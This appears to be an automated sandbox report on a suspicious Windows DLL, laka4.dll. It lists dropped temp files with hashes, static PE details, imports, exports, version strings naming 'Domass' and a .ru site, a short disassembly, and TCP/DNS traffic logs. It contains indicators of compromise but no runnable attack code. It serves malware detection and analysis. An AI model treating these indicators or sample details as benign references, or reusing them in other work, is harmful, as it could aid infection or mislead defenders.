C:\Users\user\AppData\Local\Temp\~DFD4017EA5A1AF02BA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39641
Entropy (8bit):	0.5724547209951452
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+npLCJXoYpHAcpoYpHAc5oYpHAc+:kBqoxKAuqR+npLCJXbHAkbHAQbHAJ
MD5:	FE720DDCF19FC05A8768F54960813287
SHA1:	5DF1429D347E4CC904ACA8EBD4E17F020B85059C
SHA-256:	0BEC31EA43949C88B544FCBDA500D105D4FFA8871BA2964746C0CA1CA780909D
SHA-512:	FE7F1C93853E93661E456C128397AB7E638883AEFEA36328C8EE5E24D58D680E03CB430CB5CC4245956EA670E8EDCE5383CC1B5358D409FEBEA8894A8A5303A0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD692E6FF3D6732D0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39625
Entropy (8bit):	0.5675342653298222
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+xjDdcgIgqCjVCjECjVCjYCjVCjh:kBqoxKAuvScS+xvdc/ZMGEMGYMGh
MD5:	4EE1DB6BD3A76888E93EC77DB84953E3
SHA1:	0EC2FA1EB72D963DB349C3274B3474C4ABF6CB89
SHA-256:	130754FF8C6402DD6FBCBD035C85C87F7A1D4E07D7AB4CA12BEF17777EA3DD0B
SHA-512:	8C35E8C24C8AC3BC8C9D0C470A2016BC7C07F97DE401D051E0C586E24BE1B7F65A2897A28A4743B810BD98A0B41CC9F22E092C5BD4C949EA0335BDB28AC17C63
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEE3E6B2ACC934948.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39625
Entropy (8bit):	0.5685170618601547
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+vRT6hHEuMdCUV311EuMdCUV311EuMdCUV31a:kBqoxKAuqR+vRT6hHdurVdurVdur6
MD5:	6947D3C3494D30F366C3B15E35019372
SHA1:	1CB72786F9B3ACA9059B5FC6B16AD70AF4AA063B
SHA-256:	3C1966046471645718B594C30300BFFA26AC2ED71BC14287BBE65523408F12D8
SHA-512:	57851707775B4CAAB2BCF90EB49A245382CC9D96A733817FC10959789EDA25D33505D883B4EBF486407D441B06D985EC0CEF5380C6CC29070534DE669F6108BE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF281750E0F709160.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39601
Entropy (8bit):	0.5634958027255507
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+dHDBgDpTRlBqpvTRlBqpzTRlBqpY:kBqoxKAuqR+dHDBgDpXBcvXBczXBcY
MD5:	CDA19DD7BBCC843A532858E5DFCCFDAA
SHA1:	D03C2B9263ACB8A5879E1151FEF0245BC4703FAB
SHA-256:	4B03CC4BD6250C8B85163CB15414B7A975CDAC387303D7D011DC8BD93BCA27C9
SHA-512:	410569867C71C5D26FBF387F8B6595D8D3CAB6EF669FAB06D53EEB86E599A3B6CEAB8EEA77BAA767D447EE5B68FC90B334FE8C336442AD64362CB84631C416C0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFCDBC08326237A5C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5725063185379469
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+WQKjQekUZwUcWSWkUZwUcWSekUZwUcWSX:kBqoxKAuqR+WQKjQevZZSWvZZSevZZSX
MD5:	CB95676783A7C0559FABBD99B4FBFA84
SHA1:	9C7D9386C105AC5E54F16C5ED41AFDFE133F45F8
SHA-256:	6C65C596AA241AC22C73D89A93E10818D40E9610453BCE3E3C2C14E7E64C873E
SHA-512:	5869BFCDA5283A6445D00152C74870FA3418B51D60D3C0C95C9EC8A48C0C7DB0ED4403866D4C4A683EF25D19528328BD9A8A87109BB35BB252DF4C3489018F43
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CTV14NG8HN4MIMQ4JSIQ.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1901169993125875
Encrypted:	false
SSDEEP:	48:HdiYPAIBC9GrIoTAsASFUdiYPAIBh683GrIoTAczvdiYPAIBx9GrIoTAV1H:NPAD9SzAJDPAA3SzASPAU9SzAf
MD5:	CD6351573A1A53FD3C6964072F3C28AE
SHA1:	D63579793EFAAD43A0485ABD0BD3C2FEDB4163ED
SHA-256:	FC2D9A1306C72C94CF40018518CB2BD226EE7840BE3D1727EDC7381A4E123D3C
SHA-512:	C622BA0CDACEE75E2AC689366A335C0B6FE33B5429859E978A705F7F1423C39B93DA839988906020E250B6EA995919C3446F1882872FCAEBD0A4652794FBB400
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.......}<....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........,`......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DS9PKDU1ADCEBGDWZAN9.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1907988809997274
Encrypted:	false
SSDEEP:	48:VdiYPAIBC9GrIoTAsASFUdiYPAIBh683GrIoTAczvdiYPAIBx9GrIoTAV1H:7PAD9SzAJDPAA3SzASPAU9SzAf
MD5:	7CEE880E92A074E53480981EDE0CE4DB
SHA1:	DCC00D7D74779E7372FB9963BD56637CDDA25751
SHA-256:	3EDF5F2854C0F6566BD56852519514CEBF2AC912E973AE247A617B5129D5AEB1
SHA-512:	134007E146FC72A9AEC82E255CB8908AD3506D88759212A550CD01BB5D31EF5FB7AD0283F926869CD36B801ED2C79674A67298D1332246DBA06BC28FA2D8AFAB
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.......}<....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.>Qr<....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........,`......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QM0XIDVGW7VP9E472G5C.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1901169993125875
Encrypted:	false
SSDEEP:	48:HdiYPAIBC9GrIoTAsASFUdiYPAIBh683GrIoTAczvdiYPAIBx9GrIoTAV1H:NPAD9SzAJDPAA3SzASPAU9SzAf
MD5:	CD6351573A1A53FD3C6964072F3C28AE
SHA1:	D63579793EFAAD43A0485ABD0BD3C2FEDB4163ED
SHA-256:	FC2D9A1306C72C94CF40018518CB2BD226EE7840BE3D1727EDC7381A4E123D3C
SHA-512:	C622BA0CDACEE75E2AC689366A335C0B6FE33B5429859E978A705F7F1423C39B93DA839988906020E250B6EA995919C3446F1882872FCAEBD0A4652794FBB400
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.......}<....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........,`......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.314310311047957
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	laka4.dll
File size:	603648
MD5:	4f2aee8563f78102b67ea3f6d9b9166b
SHA1:	518888baf0266a9638d20fd04cb5727f864d3b39
SHA256:	fd35940bf6701f7d98b39196b19273c86c74757ca2c226cff607fa23df183e03
SHA512:	e3f198d7d8a7e37613e16e6b468efc88891a25cd524a2084eee314ea56e8f34efbd513f8741224d06361d0e5fcf5cab631beecddf08142118c2d58569ee8f77a
SSDEEP:	12288:NymJLjgQUqkZTwa6vcUpO59Nu6FaLLCvtd:nJ3gQUhZ85kz5b2HC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z...>..F>..F>..F...F=..F .tF<..F..qF<..F .rF;..F .dF...F .cF9..F...F1..F>..F...F .mF1..F .uF?..F .sF?..F .vF?..FRich>..F.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1036943
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x49EF9468 [Wed Apr 22 22:04:24 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	671c9bfc3eed16f2925cb2e29e0249f8

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F29ACC5C8C7h
call 00007F29ACC68A2Eh
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F29ACC5C7B1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push dword ptr [0109A368h]
call 00007F29ACC65684h
push dword ptr [0109A364h]
mov edi, eax
mov dword ptr [ebp-04h], edi
call 00007F29ACC65674h
mov esi, eax
pop ecx
pop ecx
cmp esi, edi
jc 00007F29ACC5C949h
mov ebx, esi
sub ebx, edi
lea eax, dword ptr [ebx+04h]
cmp eax, 04h
jc 00007F29ACC5C939h
push edi
call 00007F29ACC68A6Fh
mov edi, eax
lea eax, dword ptr [ebx+04h]
pop ecx
cmp edi, eax
jnc 00007F29ACC5C90Ah
mov eax, 00000800h
cmp edi, eax
jnc 00007F29ACC5C8C4h
mov eax, edi
add eax, edi
cmp eax, edi
jc 00007F29ACC5C8D1h
push eax
push dword ptr [ebp-04h]
call 00007F29ACC60DE1h
pop ecx
pop ecx
test eax, eax
jne 00007F29ACC5C8D8h
lea eax, dword ptr [edi+10h]
cmp eax, edi
jc 00007F29ACC5C902h
push eax
push dword ptr [ebp-04h]
call 00007F29ACC60DCBh
pop ecx
pop ecx
test eax, eax
je 00007F29ACC5C8F3h
sar ebx, 02h
push eax
lea esi, dword ptr [eax+ebx*4]
call 00007F29ACC6558Fh
pop ecx
mov dword ptr [0109A368h], eax
push dword ptr [ebp+08h]
call 00007F29ACC65581h
mov dword ptr [esi], eax
add esi, 04h
push esi
call 00007F29ACC65576h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2008 build 21022
[EXP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x8b0c0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a584	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9b000	0x51c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0x31f8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5b240	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x87130	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5b000	0x1e4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x593f0	0x59400	False	0.582999606092	data	6.6215555103	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x5b000	0x30124	0x30200	False	0.613626217532	data	5.18904822659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8c000	0xe380	0x5a00	False	0.469010416667	data	5.12020315418	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x9b000	0x51c	0x600	False	0.401041666667	data	4.47416400236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0x3a48	0x3c00	False	0.655989583333	data	6.12459563016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x9b0a0	0x320	data	English	United States
RT_MANIFEST	0x9b3c0	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateEventA, GetVersion, VirtualProtectEx, Sleep, GetSystemDirectoryA, GetTempPathA, CreateSemaphoreA, CreateFileA, FileTimeToLocalFileTime, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, SetEnvironmentVariableA, GetLocaleInfoW, GetConsoleMode, GetConsoleCP, SetFilePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryA, QueryPerformanceFrequency, GlobalAlloc, SetUnhandledExceptionFilter, GlobalFree, WriteConsoleW, lstrcmpiA, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, WideCharToMultiByte, InterlockedCompareExchange, MultiByteToWideChar, GetLocaleInfoA, RtlUnwind, RaiseException, GetCurrentThreadId, GetCommandLineA, UnhandledExceptionFilter, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, LCMapStringA, LCMapStringW, GetCPInfo, GetTimeFormatA, GetDateFormatA, CompareStringA, CompareStringW, GetStringTypeW, HeapAlloc, GetModuleHandleW, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThread, GetACP, GetOEMCP, IsValidCodePage, GetFileAttributesA, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, SetConsoleCtrlHandler, WriteFile, FatalAppExitA, VirtualAlloc, HeapReAlloc, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetModuleHandleA, GetTimeZoneInformation, GetExitCodeProcess, WaitForSingleObject, CloseHandle, CreateProcessA, FreeLibrary, FlushFileBuffers
USER32.dll	MessageBoxA
SHLWAPI.dll	PathIsRootA, PathStripToRootA, PathCanonicalizeA
WINSPOOL.DRV	GetPrinterA, DeletePrinterConnectionA, DocumentPropertiesW, OpenPrinterA, ClosePrinter
COMCTL32.dll	ImageList_Draw, CreatePropertySheetPageA, ImageList_SetDragCursorImage, ImageList_LoadImageA, PropertySheetA

Exports

Name	Ordinal	Address
Brightnight	1	0x10206e0
DllRegisterServer	2	0x10205f0

Version Infos

Description	Data
LegalCopyright	2016 Domass Corporation. All rights reserved
InternalName	smile.dll
FileVersion	0.7.3.538
CompanyName	Domass
Comments	www.blowsong.ru
ProductName	Domass Me fruit
ProductVersion	0.7.3.538
FileDescription	Me fruit
OriginalFilename	smile.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2021 00:29:55.381781101 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.381892920 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.439608097 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.439677000 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.439730883 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.439754009 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.440728903 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.440758944 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.498486996 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.498511076 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.499708891 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.499727011 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.499742985 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.499758005 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.499780893 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.499820948 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.499870062 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.508769035 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.509296894 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.509474993 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.562693119 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.566612959 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.566660881 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.566773891 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.566797972 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.566836119 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.566931963 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.566958904 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.567007065 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.567043066 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.581021070 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.581065893 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.581095934 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.581130981 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.581177950 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.604422092 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.604568005 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.620718002 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.620831966 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.620862007 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.620903015 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.620934963 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.658662081 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.662326097 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.662349939 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.663270950 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:29:55.663347960 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:29:55.759397984 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:31:38.083285093 CEST	49750	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:31:38.083430052 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:31:38.143582106 CEST	443	49751	104.20.185.68	192.168.2.4
Apr 29, 2021 00:31:38.143616915 CEST	443	49750	104.20.185.68	192.168.2.4
Apr 29, 2021 00:31:38.143801928 CEST	49751	443	192.168.2.4	104.20.185.68
Apr 29, 2021 00:31:38.143910885 CEST	49750	443	192.168.2.4	104.20.185.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2021 00:29:38.129509926 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:38.156848907 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:38.179603100 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:38.205683947 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:38.379743099 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:38.449208975 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:39.309911013 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:39.363703966 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:40.463054895 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:40.530956984 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:41.406552076 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:41.455310106 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:42.784816027 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:42.839155912 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:44.298913002 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:44.351039886 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:45.251130104 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:45.302913904 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:46.407772064 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:46.458519936 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:46.835853100 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:46.915445089 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:47.483305931 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:47.537432909 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:48.347949982 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:48.415003061 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:48.781426907 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:48.831512928 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:49.409060001 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:49.440455914 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:49.483989954 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:49.511151075 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:54.719871044 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:54.804292917 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:55.304100037 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:55.378654957 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:55.466943026 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:55.547595978 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:57.576152086 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:57.655493975 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:57.699147940 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:57.778717041 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:57.920466900 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:57.991914034 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 29, 2021 00:29:59.827832937 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:29:59.900219917 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:17.248089075 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:17.303169966 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:18.247967005 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:18.301333904 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:19.288594007 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:19.338809967 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:19.340404987 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:19.393471003 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:20.466279030 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:20.536441088 CEST	53	60875	8.8.8.8	192.168.2.4
